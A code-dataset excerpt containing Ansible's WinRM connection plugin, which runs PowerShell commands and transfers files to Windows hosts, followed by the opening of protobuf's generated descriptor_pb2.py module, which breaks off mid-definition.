repo_name
stringlengths
5
100
path
stringlengths
4
375
copies
stringclasses
991 values
size
stringlengths
4
7
content
stringlengths
666
1M
license
stringclasses
15 values
michael-dev2rights/ansible
lib/ansible/plugins/connection/winrm.py
2
25568
# (c) 2014, Chris Church <chris@ninemoreminutes.com> # Copyright (c) 2017 Ansible Project # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import (absolute_import, division, print_function) __metaclass__ = type DOCUMENTATION = """ author: Ansible Core Team connection: winrm short_description: Run tasks over Microsoft's WinRM description: - Run commands or put/fetch on a target via WinRM version_added: "2.0" options: remote_addr: description: - Address of the windows machine default: inventory_hostname vars: - name: ansible_host - name: ansible_winrm_host remote_user: description: - The user to log in as to the Windows machine vars: - name: ansible_user - name: ansible_winrm_user """ import base64 import inspect import os import re import shlex import traceback import json import tempfile import subprocess HAVE_KERBEROS = False try: import kerberos HAVE_KERBEROS = True except ImportError: pass from ansible.errors import AnsibleError, AnsibleConnectionFailure from ansible.errors import AnsibleFileNotFound from ansible.module_utils.six import string_types from ansible.module_utils.six.moves.urllib.parse import urlunsplit from ansible.module_utils._text import to_bytes, to_native, to_text from ansible.module_utils.six import binary_type from ansible.plugins.connection import ConnectionBase from ansible.plugins.shell.powershell import leaf_exec from ansible.utils.hashing import secure_hash from ansible.utils.path import makedirs_safe try: import winrm from winrm import Response from winrm.protocol import Protocol HAS_WINRM = True except ImportError as e: HAS_WINRM = False try: import xmltodict HAS_XMLTODICT = True except ImportError as e: HAS_XMLTODICT = False try: from __main__ import display except ImportError: from ansible.utils.display import Display display = Display() class Connection(ConnectionBase): '''WinRM connections over HTTP/HTTPS.''' transport = 'winrm' module_implementation_preferences = ('.ps1', '.exe', '') become_methods = ['runas'] allow_executable = False def __init__(self, *args, **kwargs): self.has_pipelining = True self.always_pipeline_modules = True self.has_native_async = True self.protocol = None self.shell_id = None self.delegate = None self._shell_type = 'powershell' # FUTURE: Add runas support super(Connection, self).__init__(*args, **kwargs) def set_host_overrides(self, host, variables, templar): ''' Override WinRM-specific options from host variables. ''' if not HAS_WINRM: return hostvars = {} for k in variables: if k.startswith('ansible_winrm'): hostvars[k] = templar.template(variables[k]) self._winrm_host = self._play_context.remote_addr self._winrm_port = int(self._play_context.port or 5986) self._winrm_scheme = hostvars.get('ansible_winrm_scheme', 'http' if self._winrm_port == 5985 else 'https') self._winrm_path = hostvars.get('ansible_winrm_path', '/wsman') self._winrm_user = self._play_context.remote_user self._winrm_pass = self._play_context.password self._become_method = self._play_context.become_method self._become_user = self._play_context.become_user self._become_pass = self._play_context.become_pass self._kinit_cmd = hostvars.get('ansible_winrm_kinit_cmd', 'kinit') if hasattr(winrm, 'FEATURE_SUPPORTED_AUTHTYPES'): self._winrm_supported_authtypes = set(winrm.FEATURE_SUPPORTED_AUTHTYPES) else: # for legacy versions of pywinrm, use the values we know are supported self._winrm_supported_authtypes = set(['plaintext', 'ssl', 'kerberos']) # TODO: figure out what we want to do with auto-transport selection in the face of NTLM/Kerb/CredSSP/Cert/Basic transport_selector = 'ssl' if self._winrm_scheme == 'https' else 'plaintext' if HAVE_KERBEROS and ((self._winrm_user and '@' in self._winrm_user)): self._winrm_transport = 'kerberos,%s' % transport_selector else: self._winrm_transport = transport_selector self._winrm_transport = hostvars.get('ansible_winrm_transport', self._winrm_transport) if isinstance(self._winrm_transport, string_types): self._winrm_transport = [x.strip() for x in self._winrm_transport.split(',') if x.strip()] unsupported_transports = set(self._winrm_transport).difference(self._winrm_supported_authtypes) if unsupported_transports: raise AnsibleError('The installed version of WinRM does not support transport(s) %s' % list(unsupported_transports)) # if kerberos is among our transports and there's a password specified, we're managing the tickets kinit_mode = to_text(hostvars.get('ansible_winrm_kinit_mode', '')).strip() if kinit_mode == "": # HACK: ideally, remove multi-transport stuff self._kerb_managed = "kerberos" in self._winrm_transport and self._winrm_pass elif kinit_mode == "managed": self._kerb_managed = True elif kinit_mode == "manual": self._kerb_managed = False else: raise AnsibleError('Unknown ansible_winrm_kinit_mode value: "%s" (must be "managed" or "manual")' % kinit_mode) # arg names we're going passing directly internal_kwarg_mask = set(['self', 'endpoint', 'transport', 'username', 'password', 'scheme', 'path', 'kinit_mode', 'kinit_cmd']) self._winrm_kwargs = dict(username=self._winrm_user, password=self._winrm_pass) argspec = inspect.getargspec(Protocol.__init__) supported_winrm_args = set(argspec.args) supported_winrm_args.update(internal_kwarg_mask) passed_winrm_args = set([v.replace('ansible_winrm_', '') for v in hostvars if v.startswith('ansible_winrm_')]) unsupported_args = passed_winrm_args.difference(supported_winrm_args) # warn for kwargs unsupported by the installed version of pywinrm for arg in unsupported_args: display.warning("ansible_winrm_{0} unsupported by pywinrm (is an up-to-date version of pywinrm installed?)".format(arg)) # pass through matching kwargs, excluding the list we want to treat specially for arg in passed_winrm_args.difference(internal_kwarg_mask).intersection(supported_winrm_args): self._winrm_kwargs[arg] = hostvars['ansible_winrm_%s' % arg] # Until pykerberos has enough goodies to implement a rudimentary kinit/klist, simplest way is to let each connection # auth itself with a private CCACHE. def _kerb_auth(self, principal, password): if password is None: password = "" self._kerb_ccache = tempfile.NamedTemporaryFile() display.vvvvv("creating Kerberos CC at %s" % self._kerb_ccache.name) krb5ccname = "FILE:%s" % self._kerb_ccache.name krbenv = dict(KRB5CCNAME=krb5ccname) os.environ["KRB5CCNAME"] = krb5ccname kinit_cmdline = [self._kinit_cmd, principal] display.vvvvv("calling kinit for principal %s" % principal) p = subprocess.Popen(kinit_cmdline, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=krbenv) # TODO: unicode/py3 stdout, stderr = p.communicate(password + b'\n') if p.returncode != 0: raise AnsibleConnectionFailure("Kerberos auth failure: %s" % stderr.strip()) display.vvvvv("kinit succeeded for principal %s" % principal) def _winrm_connect(self): ''' Establish a WinRM connection over HTTP/HTTPS. ''' display.vvv("ESTABLISH WINRM CONNECTION FOR USER: %s on PORT %s TO %s" % (self._winrm_user, self._winrm_port, self._winrm_host), host=self._winrm_host) netloc = '%s:%d' % (self._winrm_host, self._winrm_port) endpoint = urlunsplit((self._winrm_scheme, netloc, self._winrm_path, '', '')) errors = [] for transport in self._winrm_transport: if transport == 'kerberos': if not HAVE_KERBEROS: errors.append('kerberos: the python kerberos library is not installed') continue if self._kerb_managed: self._kerb_auth(self._winrm_user, self._winrm_pass) display.vvvvv('WINRM CONNECT: transport=%s endpoint=%s' % (transport, endpoint), host=self._winrm_host) try: protocol = Protocol(endpoint, transport=transport, **self._winrm_kwargs) # open the shell from connect so we know we're able to talk to the server if not self.shell_id: self.shell_id = protocol.open_shell(codepage=65001) # UTF-8 display.vvvvv('WINRM OPEN SHELL: %s' % self.shell_id, host=self._winrm_host) return protocol except Exception as e: err_msg = to_text(e).strip() if re.search(to_text(r'Operation\s+?timed\s+?out'), err_msg, re.I): raise AnsibleError('the connection attempt timed out') m = re.search(to_text(r'Code\s+?(\d{3})'), err_msg) if m: code = int(m.groups()[0]) if code == 401: err_msg = 'the specified credentials were rejected by the server' elif code == 411: return protocol errors.append(u'%s: %s' % (transport, err_msg)) display.vvvvv(u'WINRM CONNECTION ERROR: %s\n%s' % (err_msg, to_text(traceback.format_exc())), host=self._winrm_host) if errors: raise AnsibleConnectionFailure(', '.join(map(to_native, errors))) else: raise AnsibleError('No transport found for WinRM connection') def _winrm_send_input(self, protocol, shell_id, command_id, stdin, eof=False): rq = {'env:Envelope': protocol._get_soap_header( resource_uri='http://schemas.microsoft.com/wbem/wsman/1/windows/shell/cmd', action='http://schemas.microsoft.com/wbem/wsman/1/windows/shell/Send', shell_id=shell_id)} stream = rq['env:Envelope'].setdefault('env:Body', {}).setdefault('rsp:Send', {})\ .setdefault('rsp:Stream', {}) stream['@Name'] = 'stdin' stream['@CommandId'] = command_id stream['#text'] = base64.b64encode(to_bytes(stdin)) if eof: stream['@End'] = 'true' protocol.send_message(xmltodict.unparse(rq)) def _winrm_exec(self, command, args=(), from_exec=False, stdin_iterator=None): if not self.protocol: self.protocol = self._winrm_connect() self._connected = True if from_exec: display.vvvvv("WINRM EXEC %r %r" % (command, args), host=self._winrm_host) else: display.vvvvvv("WINRM EXEC %r %r" % (command, args), host=self._winrm_host) command_id = None try: stdin_push_failed = False command_id = self.protocol.run_command(self.shell_id, to_bytes(command), map(to_bytes, args), console_mode_stdin=(stdin_iterator is None)) # TODO: try/except around this, so we can get/return the command result on a broken pipe or other failure (probably more useful than the 500 that # comes from this) try: if stdin_iterator: for (data, is_last) in stdin_iterator: self._winrm_send_input(self.protocol, self.shell_id, command_id, data, eof=is_last) except Exception as ex: from traceback import format_exc display.warning("FATAL ERROR DURING FILE TRANSFER: %s" % format_exc(ex)) stdin_push_failed = True if stdin_push_failed: raise AnsibleError('winrm send_input failed') # NB: this can hang if the receiver is still running (eg, network failed a Send request but the server's still happy). # FUTURE: Consider adding pywinrm status check/abort operations to see if the target is still running after a failure. resptuple = self.protocol.get_command_output(self.shell_id, command_id) # ensure stdout/stderr are text for py3 # FUTURE: this should probably be done internally by pywinrm response = Response(tuple(to_text(v) if isinstance(v, binary_type) else v for v in resptuple)) # TODO: check result from response and set stdin_push_failed if we have nonzero if from_exec: display.vvvvv('WINRM RESULT %r' % to_text(response), host=self._winrm_host) else: display.vvvvvv('WINRM RESULT %r' % to_text(response), host=self._winrm_host) display.vvvvvv('WINRM STDOUT %s' % to_text(response.std_out), host=self._winrm_host) display.vvvvvv('WINRM STDERR %s' % to_text(response.std_err), host=self._winrm_host) if stdin_push_failed: raise AnsibleError('winrm send_input failed; \nstdout: %s\nstderr %s' % (response.std_out, response.std_err)) return response finally: if command_id: self.protocol.cleanup_command(self.shell_id, command_id) def _connect(self): if not HAS_WINRM: raise AnsibleError("winrm or requests is not installed: %s" % to_text(e)) elif not HAS_XMLTODICT: raise AnsibleError("xmltodict is not installed: %s" % to_text(e)) super(Connection, self)._connect() if not self.protocol: self.protocol = self._winrm_connect() self._connected = True return self def _reset(self): # used by win_reboot (and any other action that might need to bounce the state) self.protocol = None self.shell_id = None self._connect() def _create_raw_wrapper_payload(self, cmd, environment=dict()): payload = { 'module_entry': to_text(base64.b64encode(to_bytes(cmd))), 'powershell_modules': {}, 'actions': ['exec'], 'exec': to_text(base64.b64encode(to_bytes(leaf_exec))), 'environment': environment } return json.dumps(payload) def _wrapper_payload_stream(self, payload, buffer_size=200000): payload_bytes = to_bytes(payload) byte_count = len(payload_bytes) for i in range(0, byte_count, buffer_size): yield payload_bytes[i:i + buffer_size], i + buffer_size >= byte_count def exec_command(self, cmd, in_data=None, sudoable=True): super(Connection, self).exec_command(cmd, in_data=in_data, sudoable=sudoable) cmd_parts = self._shell._encode_script(cmd, as_list=True, strict_mode=False, preserve_rc=False) # TODO: display something meaningful here display.vvv("EXEC (via pipeline wrapper)") stdin_iterator = None if in_data: stdin_iterator = self._wrapper_payload_stream(in_data) result = self._winrm_exec(cmd_parts[0], cmd_parts[1:], from_exec=True, stdin_iterator=stdin_iterator) result.std_out = to_bytes(result.std_out) result.std_err = to_bytes(result.std_err) # parse just stderr from CLIXML output if self.is_clixml(result.std_err): try: result.std_err = self.parse_clixml_stream(result.std_err) except: # unsure if we're guaranteed a valid xml doc- use raw output in case of error pass return (result.status_code, result.std_out, result.std_err) def exec_command_old(self, cmd, in_data=None, sudoable=True): super(Connection, self).exec_command(cmd, in_data=in_data, sudoable=sudoable) cmd_parts = shlex.split(to_bytes(cmd), posix=False) cmd_parts = map(to_text, cmd_parts) script = None cmd_ext = cmd_parts and self._shell._unquote(cmd_parts[0]).lower()[-4:] or '' # Support running .ps1 files (via script/raw). if cmd_ext == '.ps1': script = '& %s' % cmd # Support running .bat/.cmd files; change back to the default system encoding instead of UTF-8. elif cmd_ext in ('.bat', '.cmd'): script = '[System.Console]::OutputEncoding = [System.Text.Encoding]::Default; & %s' % cmd # Encode the command if not already encoded; supports running simple PowerShell commands via raw. elif '-EncodedCommand' not in cmd_parts: script = cmd if script: cmd_parts = self._shell._encode_script(script, as_list=True, strict_mode=False) if '-EncodedCommand' in cmd_parts: encoded_cmd = cmd_parts[cmd_parts.index('-EncodedCommand') + 1] decoded_cmd = to_text(base64.b64decode(encoded_cmd).decode('utf-16-le')) display.vvv("EXEC %s" % decoded_cmd, host=self._winrm_host) else: display.vvv("EXEC %s" % cmd, host=self._winrm_host) try: result = self._winrm_exec(cmd_parts[0], cmd_parts[1:], from_exec=True) except Exception: traceback.print_exc() raise AnsibleConnectionFailure("failed to exec cmd %s" % cmd) result.std_out = to_bytes(result.std_out) result.std_err = to_bytes(result.std_err) # parse just stderr from CLIXML output if self.is_clixml(result.std_err): try: result.std_err = self.parse_clixml_stream(result.std_err) except: # unsure if we're guaranteed a valid xml doc- use raw output in case of error pass return (result.status_code, result.std_out, result.std_err) def is_clixml(self, value): return value.startswith(b"#< CLIXML") # hacky way to get just stdout- not always sure of doc framing here, so use with care def parse_clixml_stream(self, clixml_doc, stream_name='Error'): clear_xml = clixml_doc.replace(b'#< CLIXML\r\n', b'') doc = xmltodict.parse(clear_xml) lines = [l.get('#text', '').replace('_x000D__x000A_', '') for l in doc.get('Objs', {}).get('S', {}) if l.get('@S') == stream_name] return '\r\n'.join(lines) # FUTURE: determine buffer size at runtime via remote winrm config? def _put_file_stdin_iterator(self, in_path, out_path, buffer_size=250000): in_size = os.path.getsize(to_bytes(in_path, errors='surrogate_or_strict')) offset = 0 with open(to_bytes(in_path, errors='surrogate_or_strict'), 'rb') as in_file: for out_data in iter((lambda: in_file.read(buffer_size)), b''): offset += len(out_data) self._display.vvvvv('WINRM PUT "%s" to "%s" (offset=%d size=%d)' % (in_path, out_path, offset, len(out_data)), host=self._winrm_host) # yes, we're double-encoding over the wire in this case- we want to ensure that the data shipped to the end PS pipeline is still b64-encoded b64_data = base64.b64encode(out_data) + b'\r\n' # cough up the data, as well as an indicator if this is the last chunk so winrm_send knows to set the End signal yield b64_data, (in_file.tell() == in_size) if offset == 0: # empty file, return an empty buffer + eof to close it yield "", True def put_file(self, in_path, out_path): super(Connection, self).put_file(in_path, out_path) out_path = self._shell._unquote(out_path) display.vvv('PUT "%s" TO "%s"' % (in_path, out_path), host=self._winrm_host) if not os.path.exists(to_bytes(in_path, errors='surrogate_or_strict')): raise AnsibleFileNotFound('file or module does not exist: "%s"' % in_path) script_template = u''' begin {{ $path = '{0}' $DebugPreference = "Continue" $ErrorActionPreference = "Stop" Set-StrictMode -Version 2 $fd = [System.IO.File]::Create($path) $sha1 = [System.Security.Cryptography.SHA1CryptoServiceProvider]::Create() $bytes = @() #initialize for empty file case }} process {{ $bytes = [System.Convert]::FromBase64String($input) $sha1.TransformBlock($bytes, 0, $bytes.Length, $bytes, 0) | Out-Null $fd.Write($bytes, 0, $bytes.Length) }} end {{ $sha1.TransformFinalBlock($bytes, 0, 0) | Out-Null $hash = [System.BitConverter]::ToString($sha1.Hash).Replace("-", "").ToLowerInvariant() $fd.Close() Write-Output "{{""sha1"":""$hash""}}" }} ''' script = script_template.format(self._shell._escape(out_path)) cmd_parts = self._shell._encode_script(script, as_list=True, strict_mode=False, preserve_rc=False) result = self._winrm_exec(cmd_parts[0], cmd_parts[1:], stdin_iterator=self._put_file_stdin_iterator(in_path, out_path)) # TODO: improve error handling if result.status_code != 0: raise AnsibleError(to_native(result.std_err)) put_output = json.loads(result.std_out) remote_sha1 = put_output.get("sha1") if not remote_sha1: raise AnsibleError("Remote sha1 was not returned") local_sha1 = secure_hash(in_path) if not remote_sha1 == local_sha1: raise AnsibleError("Remote sha1 hash {0} does not match local hash {1}".format(to_native(remote_sha1), to_native(local_sha1))) def fetch_file(self, in_path, out_path): super(Connection, self).fetch_file(in_path, out_path) in_path = self._shell._unquote(in_path) out_path = out_path.replace('\\', '/') display.vvv('FETCH "%s" TO "%s"' % (in_path, out_path), host=self._winrm_host) buffer_size = 2**19 # 0.5MB chunks makedirs_safe(os.path.dirname(out_path)) out_file = None try: offset = 0 while True: try: script = ''' If (Test-Path -PathType Leaf "%(path)s") { $stream = New-Object IO.FileStream("%(path)s", [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [IO.FileShare]::ReadWrite); $stream.Seek(%(offset)d, [System.IO.SeekOrigin]::Begin) | Out-Null; $buffer = New-Object Byte[] %(buffer_size)d; $bytesRead = $stream.Read($buffer, 0, %(buffer_size)d); $bytes = $buffer[0..($bytesRead-1)]; [System.Convert]::ToBase64String($bytes); $stream.Close() | Out-Null; } ElseIf (Test-Path -PathType Container "%(path)s") { Write-Host "[DIR]"; } Else { Write-Error "%(path)s does not exist"; Exit 1; } ''' % dict(buffer_size=buffer_size, path=self._shell._escape(in_path), offset=offset) display.vvvvv('WINRM FETCH "%s" to "%s" (offset=%d)' % (in_path, out_path, offset), host=self._winrm_host) cmd_parts = self._shell._encode_script(script, as_list=True, preserve_rc=False) result = self._winrm_exec(cmd_parts[0], cmd_parts[1:]) if result.status_code != 0: raise IOError(to_native(result.std_err)) if result.std_out.strip() == '[DIR]': data = None else: data = base64.b64decode(result.std_out.strip()) if data is None: makedirs_safe(out_path) break else: if not out_file: # If out_path is a directory and we're expecting a file, bail out now. if os.path.isdir(to_bytes(out_path, errors='surrogate_or_strict')): break out_file = open(to_bytes(out_path, errors='surrogate_or_strict'), 'wb') out_file.write(data) if len(data) < buffer_size: break offset += len(data) except Exception: traceback.print_exc() raise AnsibleError('failed to transfer file to "%s"' % out_path) finally: if out_file: out_file.close() def close(self): if self.protocol and self.shell_id: display.vvvvv('WINRM CLOSE SHELL: %s' % self.shell_id, host=self._winrm_host) self.protocol.close_shell(self.shell_id) self.shell_id = None self.protocol = None self._connected = False
gpl-3.0
ltilve/ChromiumGStreamerBackend
third_party/protobuf/descriptor_pb2.py
193
48695
# Generated by the protocol buffer compiler. DO NOT EDIT! from google.protobuf import descriptor from google.protobuf import message from google.protobuf import reflection # @@protoc_insertion_point(imports) DESCRIPTOR = descriptor.FileDescriptor( name='google/protobuf/descriptor.proto', package='google.protobuf', serialized_pb='\n google/protobuf/descriptor.proto\x12\x0fgoogle.protobuf\"G\n\x11\x46ileDescriptorSet\x12\x32\n\x04\x66ile\x18\x01 \x03(\x0b\x32$.google.protobuf.FileDescriptorProto\"\xdc\x02\n\x13\x46ileDescriptorProto\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0f\n\x07package\x18\x02 \x01(\t\x12\x12\n\ndependency\x18\x03 \x03(\t\x12\x36\n\x0cmessage_type\x18\x04 \x03(\x0b\x32 .google.protobuf.DescriptorProto\x12\x37\n\tenum_type\x18\x05 \x03(\x0b\x32$.google.protobuf.EnumDescriptorProto\x12\x38\n\x07service\x18\x06 \x03(\x0b\x32\'.google.protobuf.ServiceDescriptorProto\x12\x38\n\textension\x18\x07 \x03(\x0b\x32%.google.protobuf.FieldDescriptorProto\x12-\n\x07options\x18\x08 \x01(\x0b\x32\x1c.google.protobuf.FileOptions\"\xa9\x03\n\x0f\x44\x65scriptorProto\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x34\n\x05\x66ield\x18\x02 \x03(\x0b\x32%.google.protobuf.FieldDescriptorProto\x12\x38\n\textension\x18\x06 \x03(\x0b\x32%.google.protobuf.FieldDescriptorProto\x12\x35\n\x0bnested_type\x18\x03 \x03(\x0b\x32 .google.protobuf.DescriptorProto\x12\x37\n\tenum_type\x18\x04 \x03(\x0b\x32$.google.protobuf.EnumDescriptorProto\x12H\n\x0f\x65xtension_range\x18\x05 \x03(\x0b\x32/.google.protobuf.DescriptorProto.ExtensionRange\x12\x30\n\x07options\x18\x07 \x01(\x0b\x32\x1f.google.protobuf.MessageOptions\x1a,\n\x0e\x45xtensionRange\x12\r\n\x05start\x18\x01 \x01(\x05\x12\x0b\n\x03\x65nd\x18\x02 \x01(\x05\"\x94\x05\n\x14\x46ieldDescriptorProto\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0e\n\x06number\x18\x03 \x01(\x05\x12:\n\x05label\x18\x04 \x01(\x0e\x32+.google.protobuf.FieldDescriptorProto.Label\x12\x38\n\x04type\x18\x05 \x01(\x0e\x32*.google.protobuf.FieldDescriptorProto.Type\x12\x11\n\ttype_name\x18\x06 \x01(\t\x12\x10\n\x08\x65xtendee\x18\x02 \x01(\t\x12\x15\n\rdefault_value\x18\x07 \x01(\t\x12.\n\x07options\x18\x08 \x01(\x0b\x32\x1d.google.protobuf.FieldOptions\"\xb6\x02\n\x04Type\x12\x0f\n\x0bTYPE_DOUBLE\x10\x01\x12\x0e\n\nTYPE_FLOAT\x10\x02\x12\x0e\n\nTYPE_INT64\x10\x03\x12\x0f\n\x0bTYPE_UINT64\x10\x04\x12\x0e\n\nTYPE_INT32\x10\x05\x12\x10\n\x0cTYPE_FIXED64\x10\x06\x12\x10\n\x0cTYPE_FIXED32\x10\x07\x12\r\n\tTYPE_BOOL\x10\x08\x12\x0f\n\x0bTYPE_STRING\x10\t\x12\x0e\n\nTYPE_GROUP\x10\n\x12\x10\n\x0cTYPE_MESSAGE\x10\x0b\x12\x0e\n\nTYPE_BYTES\x10\x0c\x12\x0f\n\x0bTYPE_UINT32\x10\r\x12\r\n\tTYPE_ENUM\x10\x0e\x12\x11\n\rTYPE_SFIXED32\x10\x0f\x12\x11\n\rTYPE_SFIXED64\x10\x10\x12\x0f\n\x0bTYPE_SINT32\x10\x11\x12\x0f\n\x0bTYPE_SINT64\x10\x12\"C\n\x05Label\x12\x12\n\x0eLABEL_OPTIONAL\x10\x01\x12\x12\n\x0eLABEL_REQUIRED\x10\x02\x12\x12\n\x0eLABEL_REPEATED\x10\x03\"\x8c\x01\n\x13\x45numDescriptorProto\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x38\n\x05value\x18\x02 \x03(\x0b\x32).google.protobuf.EnumValueDescriptorProto\x12-\n\x07options\x18\x03 \x01(\x0b\x32\x1c.google.protobuf.EnumOptions\"l\n\x18\x45numValueDescriptorProto\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0e\n\x06number\x18\x02 \x01(\x05\x12\x32\n\x07options\x18\x03 \x01(\x0b\x32!.google.protobuf.EnumValueOptions\"\x90\x01\n\x16ServiceDescriptorProto\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x36\n\x06method\x18\x02 \x03(\x0b\x32&.google.protobuf.MethodDescriptorProto\x12\x30\n\x07options\x18\x03 \x01(\x0b\x32\x1f.google.protobuf.ServiceOptions\"\x7f\n\x15MethodDescriptorProto\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x12\n\ninput_type\x18\x02 \x01(\t\x12\x13\n\x0boutput_type\x18\x03 \x01(\t\x12/\n\x07options\x18\x04 \x01(\x0b\x32\x1e.google.protobuf.MethodOptions\"\xa4\x03\n\x0b\x46ileOptions\x12\x14\n\x0cjava_package\x18\x01 \x01(\t\x12\x1c\n\x14java_outer_classname\x18\x08 \x01(\t\x12\"\n\x13java_multiple_files\x18\n \x01(\x08:\x05\x66\x61lse\x12\x46\n\x0coptimize_for\x18\t \x01(\x0e\x32).google.protobuf.FileOptions.OptimizeMode:\x05SPEED\x12!\n\x13\x63\x63_generic_services\x18\x10 \x01(\x08:\x04true\x12#\n\x15java_generic_services\x18\x11 \x01(\x08:\x04true\x12!\n\x13py_generic_services\x18\x12 \x01(\x08:\x04true\x12\x43\n\x14uninterpreted_option\x18\xe7\x07 \x03(\x0b\x32$.google.protobuf.UninterpretedOption\":\n\x0cOptimizeMode\x12\t\n\x05SPEED\x10\x01\x12\r\n\tCODE_SIZE\x10\x02\x12\x10\n\x0cLITE_RUNTIME\x10\x03*\t\x08\xe8\x07\x10\x80\x80\x80\x80\x02\"\xb8\x01\n\x0eMessageOptions\x12&\n\x17message_set_wire_format\x18\x01 \x01(\x08:\x05\x66\x61lse\x12.\n\x1fno_standard_descriptor_accessor\x18\x02 \x01(\x08:\x05\x66\x61lse\x12\x43\n\x14uninterpreted_option\x18\xe7\x07 \x03(\x0b\x32$.google.protobuf.UninterpretedOption*\t\x08\xe8\x07\x10\x80\x80\x80\x80\x02\"\x94\x02\n\x0c\x46ieldOptions\x12:\n\x05\x63type\x18\x01 \x01(\x0e\x32#.google.protobuf.FieldOptions.CType:\x06STRING\x12\x0e\n\x06packed\x18\x02 \x01(\x08\x12\x19\n\ndeprecated\x18\x03 \x01(\x08:\x05\x66\x61lse\x12\x1c\n\x14\x65xperimental_map_key\x18\t \x01(\t\x12\x43\n\x14uninterpreted_option\x18\xe7\x07 \x03(\x0b\x32$.google.protobuf.UninterpretedOption\"/\n\x05\x43Type\x12\n\n\x06STRING\x10\x00\x12\x08\n\x04\x43ORD\x10\x01\x12\x10\n\x0cSTRING_PIECE\x10\x02*\t\x08\xe8\x07\x10\x80\x80\x80\x80\x02\"]\n\x0b\x45numOptions\x12\x43\n\x14uninterpreted_option\x18\xe7\x07 \x03(\x0b\x32$.google.protobuf.UninterpretedOption*\t\x08\xe8\x07\x10\x80\x80\x80\x80\x02\"b\n\x10\x45numValueOptions\x12\x43\n\x14uninterpreted_option\x18\xe7\x07 \x03(\x0b\x32$.google.protobuf.UninterpretedOption*\t\x08\xe8\x07\x10\x80\x80\x80\x80\x02\"`\n\x0eServiceOptions\x12\x43\n\x14uninterpreted_option\x18\xe7\x07 \x03(\x0b\x32$.google.protobuf.UninterpretedOption*\t\x08\xe8\x07\x10\x80\x80\x80\x80\x02\"_\n\rMethodOptions\x12\x43\n\x14uninterpreted_option\x18\xe7\x07 \x03(\x0b\x32$.google.protobuf.UninterpretedOption*\t\x08\xe8\x07\x10\x80\x80\x80\x80\x02\"\x85\x02\n\x13UninterpretedOption\x12;\n\x04name\x18\x02 \x03(\x0b\x32-.google.protobuf.UninterpretedOption.NamePart\x12\x18\n\x10identifier_value\x18\x03 \x01(\t\x12\x1a\n\x12positive_int_value\x18\x04 \x01(\x04\x12\x1a\n\x12negative_int_value\x18\x05 \x01(\x03\x12\x14\n\x0c\x64ouble_value\x18\x06 \x01(\x01\x12\x14\n\x0cstring_value\x18\x07 \x01(\x0c\x1a\x33\n\x08NamePart\x12\x11\n\tname_part\x18\x01 \x02(\t\x12\x14\n\x0cis_extension\x18\x02 \x02(\x08\x42)\n\x13\x63om.google.protobufB\x10\x44\x65scriptorProtosH\x01') _FIELDDESCRIPTORPROTO_TYPE = descriptor.EnumDescriptor( name='Type', full_name='google.protobuf.FieldDescriptorProto.Type', filename=None, file=DESCRIPTOR, values=[ descriptor.EnumValueDescriptor( name='TYPE_DOUBLE', index=0, number=1, options=None, type=None), descriptor.EnumValueDescriptor( name='TYPE_FLOAT', index=1, number=2, options=None, type=None), descriptor.EnumValueDescriptor( name='TYPE_INT64', index=2, number=3, options=None, type=None), descriptor.EnumValueDescriptor( name='TYPE_UINT64', index=3, number=4, options=None, type=None), descriptor.EnumValueDescriptor( name='TYPE_INT32', index=4, number=5, options=None, type=None), descriptor.EnumValueDescriptor( name='TYPE_FIXED64', index=5, number=6, options=None, type=None), descriptor.EnumValueDescriptor( name='TYPE_FIXED32', index=6, number=7, options=None, type=None), descriptor.EnumValueDescriptor( name='TYPE_BOOL', index=7, number=8, options=None, type=None), descriptor.EnumValueDescriptor( name='TYPE_STRING', index=8, number=9, options=None, type=None), descriptor.EnumValueDescriptor( name='TYPE_GROUP', index=9, number=10, options=None, type=None), descriptor.EnumValueDescriptor( name='TYPE_MESSAGE', index=10, number=11, options=None, type=None), descriptor.EnumValueDescriptor( name='TYPE_BYTES', index=11, number=12, options=None, type=None), descriptor.EnumValueDescriptor( name='TYPE_UINT32', index=12, number=13, options=None, type=None), descriptor.EnumValueDescriptor( name='TYPE_ENUM', index=13, number=14, options=None, type=None), descriptor.EnumValueDescriptor( name='TYPE_SFIXED32', index=14, number=15, options=None, type=None), descriptor.EnumValueDescriptor( name='TYPE_SFIXED64', index=15, number=16, options=None, type=None), descriptor.EnumValueDescriptor( name='TYPE_SINT32', index=16, number=17, options=None, type=None), descriptor.EnumValueDescriptor( name='TYPE_SINT64', index=17, number=18, options=None, type=None), ], containing_type=None, options=None, serialized_start=1187, serialized_end=1497, ) _FIELDDESCRIPTORPROTO_LABEL = descriptor.EnumDescriptor( name='Label', full_name='google.protobuf.FieldDescriptorProto.Label', filename=None, file=DESCRIPTOR, values=[ descriptor.EnumValueDescriptor( name='LABEL_OPTIONAL', index=0, number=1, options=None, type=None), descriptor.EnumValueDescriptor( name='LABEL_REQUIRED', index=1, number=2, options=None, type=None), descriptor.EnumValueDescriptor( name='LABEL_REPEATED', index=2, number=3, options=None, type=None), ], containing_type=None, options=None, serialized_start=1499, serialized_end=1566, ) _FILEOPTIONS_OPTIMIZEMODE = descriptor.EnumDescriptor( name='OptimizeMode', full_name='google.protobuf.FileOptions.OptimizeMode', filename=None, file=DESCRIPTOR, values=[ descriptor.EnumValueDescriptor( name='SPEED', index=0, number=1, options=None, type=None), descriptor.EnumValueDescriptor( name='CODE_SIZE', index=1, number=2, options=None, type=None), descriptor.EnumValueDescriptor( name='LITE_RUNTIME', index=2, number=3, options=None, type=None), ], containing_type=None, options=None, serialized_start=2449, serialized_end=2507, ) _FIELDOPTIONS_CTYPE = descriptor.EnumDescriptor( name='CType', full_name='google.protobuf.FieldOptions.CType', filename=None, file=DESCRIPTOR, values=[ descriptor.EnumValueDescriptor( name='STRING', index=0, number=0, options=None, type=None), descriptor.EnumValueDescriptor( name='CORD', index=1, number=1, options=None, type=None), descriptor.EnumValueDescriptor( name='STRING_PIECE', index=2, number=2, options=None, type=None), ], containing_type=None, options=None, serialized_start=2926, serialized_end=2973, ) _FILEDESCRIPTORSET = descriptor.Descriptor( name='FileDescriptorSet', full_name='google.protobuf.FileDescriptorSet', filename=None, 